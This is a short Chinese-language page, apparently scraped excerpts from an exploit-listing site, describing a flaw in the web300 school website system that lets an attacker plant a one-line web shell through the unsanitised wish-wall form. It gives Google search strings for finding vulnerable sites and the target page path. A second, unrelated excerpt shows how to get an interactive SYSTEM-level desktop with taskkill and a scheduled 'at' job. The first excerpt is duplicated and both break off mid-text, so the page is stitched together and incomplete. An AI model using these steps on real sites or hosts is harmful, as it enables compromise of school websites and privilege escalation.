web300全能学校网站管理系统数据库插马漏洞
漏洞描述:
web300全能学校网站管理系统对许愿墙的数据库未处理,可插入一句话。
漏洞测试:
Google:inurl:plus_dg.asp 或者 inurl:downdown.asp
跳到/xy/wish.asp页面,点击 我要许愿 在许愿内容处......
web300全能学校网站管理系统数据库插马漏洞
漏洞描述:
web300全能学校网站管理系统对许愿墙的数据库未处理,可插入一句话。
漏洞测试:
Google:inurl:plus_dg.asp 或者 inurl:downdown.asp
跳到/xy/wish.asp页面,点击 我要许愿 在许愿内容处......
使用权限最高的system账户
一、在命令行下结束explorer进程
taskkill /f /im explorer.exe
二、用计划任务启动交互式的界面
at 13:30 /interactive explorer.exe
必须开启Task Scheduler服务,默认是开启的。这样当到了1......